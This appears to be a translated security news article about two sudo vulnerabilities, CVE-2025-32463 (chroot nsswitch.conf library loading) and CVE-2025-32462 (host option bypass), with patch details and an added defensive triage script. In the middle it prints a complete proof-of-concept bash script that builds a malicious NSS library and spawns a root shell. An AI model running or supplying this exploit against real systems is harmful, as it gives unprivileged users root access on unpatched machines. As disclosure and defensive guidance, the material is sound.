Vulnerability in sudo that allows root privileges to be obtained on the system

A vulnerability (CVE-2025-32463) has been found in the sudo package, which is used to run commands on behalf of other users. The vulnerability allows any unprivileged user to execute code with root privileges, even if that user is not listed in the sudoers configuration. Distributions that use the /etc/nsswitch.conf configuration file are susceptible to the problem. For example, exploitation was demonstrated on Ubuntu 24.04 and Fedora 41.

The vulnerability affects the default configuration and manifests in sudo versions 1.9.14 through 1.9.17 (it may possibly affect all versions since 1.8.33). The problem is fixed in sudo 1.9.17p1. You can track the availability of an updated package or patch for your distribution on the following pages (if a page is not available, the distribution's developers have not yet begun to investigate the problem): Debian, Ubuntu, Fedora, SUSE/openSUSE, RHEL, Gentoo and Arch (1, 2).

The problem is caused by the fact that when the -R (--chroot) option is used to run a command in a chroot environment with a user-selected root directory, the /etc/nsswitch.conf file is loaded from the new root directory rather than from the system root. Since a user can use a directory of their own as the chroot root, they can place an nsswitch.conf configuration file in it. By controlling the /etc/nsswitch.conf file loaded by the NSS (Name Service Switch) subsystem, the user can add entries to it that cause additional handlers to be invoked. These handlers are loaded by NSS as shared libraries, which can likewise be placed in a user-controlled directory. By substituting a library of their own, the user can achieve code execution in it with root privileges, because NSS processing takes place before privileges are dropped.

Exploit example (the proof-of-concept script quoted by the article; the garbled C header lines, the output library name and the shell keywords have been restored):

    #!/bin/bash
    STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
    cd ${STAGE?} || exit 1

    # The shared library's constructor runs as soon as NSS dlopen()s it,
    # while sudo is still running as root.
    cat > woot1337.c<<EOF
    #include <stdlib.h>
    #include <unistd.h>

    __attribute__((constructor)) void woot(void) {
      setreuid(0,0);
      setregid(0,0);
      chdir("/");
      execl("/bin/bash", "/bin/bash", NULL);
    }
    EOF

    # Fake chroot root with an nsswitch.conf that names a passwd source "/woot1337";
    # glibc resolves that service name to the file libnss_/woot1337.so.2.
    mkdir -p woot/etc libnss_
    echo "passwd: /woot1337" > woot/etc/nsswitch.conf
    cp /etc/group woot/etc
    gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

    echo "woot!"
    sudo -R woot woot

    rm -rf ${STAGE?}

Sudo 1.9.17p1 also fixes another vulnerability (CVE-2025-32462) that allows commands to be executed with root privileges, but it only manifests in sudoers configurations where the host parameter is set to a value other than ALL or the current host name. The vulnerability is caused by an error whereby the "-h" ("--host") option works not only in combination with the "-l" ("--list") option, to display the privileges of a particular host, but also when running commands. As a result, the user can specify any host when invoking sudo and bypass the restrictions of sudoers rules bound to a host name.

For the attack to work, the user must be listed in sudoers; for example, if the configuration contains "testuser testhost = ALL", the user testuser can pass "sudo -h testhost" and run commands with root privileges on any host, not only on testhost. Configurations with rules such as "testuser ALL = ALL", or without explicit rules for the user in question, are not vulnerable.
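The two checks an administrator would want after reading the above, as an added example that is not part of the article or of the sudo project: one function decides whether a sudo version string lies in the 1.9.14 to 1.9.17 range affected by CVE-2025-32463 (1.9.17p1 and later are fixed), and another lists the sudoers user specifications whose host field is not ALL, i.e. exactly the rules that "-h" could bypass under CVE-2025-32462 on an unpatched sudo. The version range and the rule shape come from the text; the function names, the "--check" entry point and the sample sudoers lines used in testing are my own assumptions.

```shell
#!/bin/sh
# Added example (not from the advisory or the sudo project): local triage
# helpers for CVE-2025-32463 and CVE-2025-32462. Function names are assumptions.

# Returns success (0) when a sudo version string such as "1.9.15p5" falls in the
# range affected by CVE-2025-32463: 1.9.14 up to and including 1.9.17.
# A "pN" patch level sorts after the plain release, so 1.9.17p1 is treated as fixed.
sudo_version_affected() {
  v=$1
  base=${v%%p*}               # "1.9.17p1" -> "1.9.17"
  p=${v#"$base"}; p=${p#p}    # "p1" -> "1", empty when there is no patch level
  [ -n "$p" ] || p=0
  major=${base%%.*}
  rest=${base#*.}
  minor=${rest%%.*}
  micro=${rest#*.}
  [ "$micro" != "$rest" ] || micro=0   # "1.9" has no micro component
  # Collapse the version into one comparable integer: M * 1e6 + m * 1e4 + u * 100 + p
  key=$(( major * 1000000 + minor * 10000 + micro * 100 + p ))
  [ "$key" -ge 1091400 ] && [ "$key" -lt 1091701 ]   # 1.9.14 <= v < 1.9.17p1
}

# Prints "user host" for every user specification in a sudoers file whose host
# list is anything other than ALL. Comments, Defaults lines, alias definitions
# and @include directives are skipped; the left-hand side of "=" is split into
# the user (first word) and the host list (the remaining words).
sudoers_host_restricted_rules() {
  grep -v -e '^[[:space:]]*#' -e '^[[:space:]]*Defaults' -e '^[[:space:]]*@' \
          -e '^[[:space:]]*[A-Za-z]*_Alias' "$1" |
  while read -r line; do
    case $line in *=*) ;; *) continue ;; esac
    lhs=${line%%=*}
    set -- $lhs                        # word-split "testuser testhost" on purpose
    [ $# -ge 2 ] || continue
    user=$1; shift
    host=$*
    [ "$host" = ALL ] && continue
    printf '%s %s\n' "$user" "$host"
  done
}

# Usage: sh sudo_triage.sh --check [/etc/sudoers]
# Runs against the live system; reading /etc/sudoers normally requires root.
if [ "${1:-}" = "--check" ]; then
  ver=$(sudo --version 2>/dev/null | sed -n '1s/^Sudo version //p')
  if [ -z "$ver" ]; then
    echo "sudo not found"
  elif sudo_version_affected "$ver"; then
    echo "sudo $ver: in the CVE-2025-32463 range, upgrade to 1.9.17p1 or later"
  else
    echo "sudo $ver: outside the 1.9.14..1.9.17 range"
  fi
  echo "host-restricted sudoers rules (bypassable via -h before 1.9.17p1):"
  sudoers_host_restricted_rules "${2:-/etc/sudoers}"
fi
```

A rule with a host list other than ALL is not a misconfiguration in itself; the output is a worklist of entries whose host binding stops being enforced on a sudo in the affected range, which is what decides how urgently the 1.9.17p1 update is needed on that machine. Rules kept in /etc/sudoers.d are not followed by this script and should be passed to the function one file at a time.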

Source: opennet.ru
